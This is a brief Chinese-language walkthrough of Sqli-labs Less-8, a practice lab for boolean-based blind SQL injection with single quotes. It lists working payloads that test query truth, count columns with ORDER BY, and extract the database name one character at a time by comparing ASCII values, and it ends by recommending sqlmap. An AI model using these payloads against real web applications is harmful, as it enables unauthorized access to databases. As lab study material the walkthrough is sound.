Sqli-labs - GET注入 - LESS 8
Get - Blind -Boolian Based -Single Quotes
函数
substr()函数:substr(a,b,c)从b位置开始,截取字符串a的c长度
ascii()函数:ascii()将某个字符转换为ascii值
如题,单引号布尔盲注,且页面无明显回显,但是能通过是否显示You are in判断语句是否正确
?id=1' and (length(database()))>0 --+
有显示,语句正确
猜字段,3
192.168.147.133/Less-8/?id=1' order by 3--+
同理,我们构造语句一个字母一个字母判断数据库名(ASCII值)
?id=1' and (select ascii(substr(database(),1,1)))>100–+
?id=1' and (select ascii(substr(database(),1,1)))=115–+
ASCII值115的字母是s
人力工作总是吃力不讨好,上sqlmap
记住,如果没有过滤关键字,sqlmap就足够用了
[Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你